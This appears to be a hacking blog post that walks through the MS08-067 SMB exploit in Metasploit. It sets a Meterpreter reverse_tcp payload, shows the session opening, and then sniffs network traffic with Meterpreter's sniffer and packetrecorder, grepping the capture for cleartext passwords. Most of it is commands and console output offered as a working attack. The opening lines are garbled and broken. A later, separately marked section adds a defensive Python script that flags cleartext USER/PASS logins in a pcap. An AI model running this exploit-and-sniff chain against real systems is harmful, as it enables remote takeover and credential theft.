Packet sniffing was never easy before. In the late 90's, we used tunneling, Wireshark, MITM and SSL stripping. After a payload of
all we need is to use exploit "
"I assume you have
opened and configured. Let's begin...
Locating and using the Windows SMB exploit:
msf > use exploit/windows/smb/ms08_067_netapi
Setting payload of reverse_tcp:
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
Setting local host for ping backs:
msf exploit(ms08_067_netapi) > set LHOST x.x.x.x
Setting target host:
msf exploit(ms08_067_netapi) > set RHOST x.x.x.x
And then fire:
msf exploit(ms08_067_netapi) > exploit
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(216 bytes)
[*] Sending stage (205824 bytes)
[*] Meterpreter session 1 opened (x.x.x.x:4444 -> x.x.x.x:1921)
Yes! We got our target under control. So now what? Just use the sniffer.
meterpreter > use sniffer
Loading extension sniffer...success.
We can even see the sniffer commands in the help output. Let's start the sniffer:
meterpreter > sniffer_start 1
[*] Capture started on interface 1 (200000 packet buffer)
Here we go...
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 19 packets to PCAP file /tmp/all.cap
meterpreter > sniffer_dump 1 /tmp/all.cap
[*] Dumping packets from interface 1...
[*] Wrote 92 packets to PCAP file /tmp/all.cap
Success! We can cat and open this .cap file with WinPcap. There's one more method for sniffing in meterpreter, called packetrecorder (same as the sniffer). Just type:
meterpreter > run packetrecorder -h
You can see the options in the help section. All you need is to give it a path for our records. Before starting sniffing, we need to choose which network interface to capture on.
meterpreter > run packetrecorder -li
After that, you're ready to fire...!
meterpreter > run packetrecorder -i 2 -l /root/
[*] Starting Packet capture on interface 2
[+] Packet capture started
[*] Packets being saved in to /root/logs/packetrecorder/....
Again, we can use Wireshark or WinPcap to see our packets. Here, for Wireshark, just locate your file and type this command:
tshark -r recordfilename.cap | grep PASS
PASS : thisissecret
PASS : thisiscaptured
-- Mutli Thinker
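
The grep for PASS above only works because the login crossed the wire in cleartext. The following added example (not part of the original post) turns that observation into an audit: it walks a classic Ethernet pcap file and reports which servers received cleartext USER/PASS commands, without returning the credential values. The function names, addresses, ports and frames in SAMPLE are constructed for illustration.

```python
import struct

def cleartext_auth_flows(pcap_bytes):
    """Return sorted (server_ip, server_port, verb) tuples for cleartext
    USER/PASS commands in a classic Ethernet pcap; values are never returned."""
    order = {b"\xd4\xc3\xb2\xa1": "<", b"\xa1\xb2\xc3\xd4": ">"}.get(pcap_bytes[:4])
    if order is None or len(pcap_bytes) < 24:
        raise ValueError("not a classic (microsecond) pcap file")
    if struct.unpack(order + "I", pcap_bytes[20:24])[0] != 1:
        raise ValueError("only Ethernet (linktype 1) captures are handled")
    hits, off = set(), 24
    while off + 16 <= len(pcap_bytes):
        incl = struct.unpack(order + "I", pcap_bytes[off + 8:off + 12])[0]
        frame = pcap_bytes[off + 16:off + 16 + incl]
        off += 16 + incl
        # Skip anything that is not IPv4 carrying TCP, or is too short to parse.
        if len(frame) < 34 or frame[12:14] != b"\x08\x00" or frame[23] != 6:
            continue
        tcp = frame[14 + (frame[14] & 0x0F) * 4:]
        if len(tcp) < 20:
            continue
        payload = tcp[(tcp[12] >> 4) * 4:]
        verb = payload[:5].upper()
        if verb in (b"USER ", b"PASS "):  # FTP/POP3-style cleartext login
            server = ".".join(str(b) for b in frame[30:34])
            hits.add((server, struct.unpack("!H", tcp[2:4])[0], verb[:4].decode()))
    return sorted(hits)

def _frame(dport, payload):
    """Build one constructed Ethernet/IPv4/TCP frame (checksums left at zero)."""
    tcp = struct.pack("!HHIIBBHHH", 40000, dport, 0, 0, 0x50, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 0, 0, 64, 6, 0,
                     bytes([192, 0, 2, 10]), bytes([192, 0, 2, 20]))
    return b"\x00" * 12 + b"\x08\x00" + ip + tcp

def _pcap(frames):
    """Wrap frames in a little-endian classic pcap container."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for f in frames:
        out += struct.pack("<IIII", 0, 0, len(f), len(f)) + f
    return out

# Constructed sample: FTP login, a lowercase POP3 PASS, and TLS-looking bytes.
SAMPLE = _pcap([_frame(21, b"USER alice\r\n"), _frame(21, b"PASS placeholder\r\n"),
                _frame(110, b"pass placeholder\r\n"), _frame(443, b"\x16\x03\x01\x02\x00")])

if __name__ == "__main__":
    for server, port, verb in cleartext_auth_flows(SAMPLE):
        print(f"cleartext {verb} sent to {server}:{port}")
```

Every server this reports is one where a capture like the one above would expose logins; moving those services to their TLS-protected equivalents removes the finding.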